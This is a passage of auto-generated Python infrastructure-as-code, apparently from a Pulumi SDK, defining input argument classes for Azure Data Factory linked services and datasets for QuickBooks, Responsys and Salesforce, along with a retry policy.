def consumer_secret(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "consumer_secret", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the QuickBooks server. (e.g. quickbooks.api.intuit.com)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@pulumi.input_type
class QuickBooksObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
QuickBooks server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'QuickBooksObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class RelationalTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_name: Optional[Any] = None):
"""
The relational table dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_name: The relational table name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'RelationalTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_name is not None:
pulumi.set(__self__, "table_name", table_name)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Optional[Any]:
"""
The relational table name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Optional[Any]):
pulumi.set(self, "table_name", value)
@pulumi.input_type
class ResponsysLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
endpoint: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Responsys linked service.
:param Any client_id: The client ID associated with the Responsys application. Type: string (or Expression with resultType string).
:param Any endpoint: The endpoint of the Responsys server.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with the Responsys application. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Responsys')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with the Responsys application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Responsys server.
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with the Responsys application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ResponsysObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Responsys dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ResponsysObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class RetryPolicyArgs:
def __init__(__self__, *,
count: Optional[Any] = None,
interval_in_seconds: Optional[pulumi.Input[int]] = None):
"""
Execution policy for an activity.
:param Any count: Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input[int] interval_in_seconds: Interval between retries in seconds. Default is 30.
"""
if count is not None:
pulumi.set(__self__, "count", count)
if interval_in_seconds is not None:
pulumi.set(__self__, "interval_in_seconds", interval_in_seconds)
@property
@pulumi.getter
def count(self) -> Optional[Any]:
"""
Maximum ordinary retry attempts. Default is 0. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[Any]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="intervalInSeconds")
def interval_in_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Interval between retries in seconds. Default is 30.
"""
return pulumi.get(self, "interval_in_seconds")
@interval_in_seconds.setter
def interval_in_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_in_seconds", value)
@pulumi.input_type
class SalesforceLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
environment_url: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
security_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for Salesforce.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any environment_url: The URL of the Salesforce instance. Default is 'https://login.salesforce.com'. To copy data from a sandbox, specify 'https://test.salesforce.com'. To copy data from a custom domain, specify, for example, 'https://[domain].my.salesforce.com'. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication of the Salesforce instance.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] security_token: The security token required to remotely access the Salesforce instance.
:param Any username: The username for Basic authentication of the Salesforce instance. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'Salesforce')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if environment_url is not None:
pulumi.set(__self__, "environment_url", environment_url)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if security_token is not None:
pulumi.set(__self__, "security_token", security_token)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="environmentUrl")
def environment_url(self) -> Optional[Any]:
"""
The URL of the Salesforce instance. Default is 'https://login.salesforce.com'. To copy data from a sandbox, specify 'https://test.salesforce.com'. To copy data from a custom domain, specify, for example, 'https://[domain].my.salesforce.com'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "environment_url")
@environment_url.setter
def environment_url(self, value: Optional[Any]):
pulumi.set(self, "environment_url", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password for Basic authentication of the Salesforce instance.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="securityToken")
def security_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The security token required to remotely access the Salesforce instance.
"""
return pulumi.get(self, "security_token")
@security_token.setter
def security_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "security_token", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The username for Basic authentication of the Salesforce instance. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SalesforceMarketingCloudLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Salesforce Marketing Cloud linked service.
:param Any client_id: The client ID associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "type", 'SalesforceMarketingCloud')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with the Salesforce Marketing Cloud application. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "use_encrypted_endpoints")
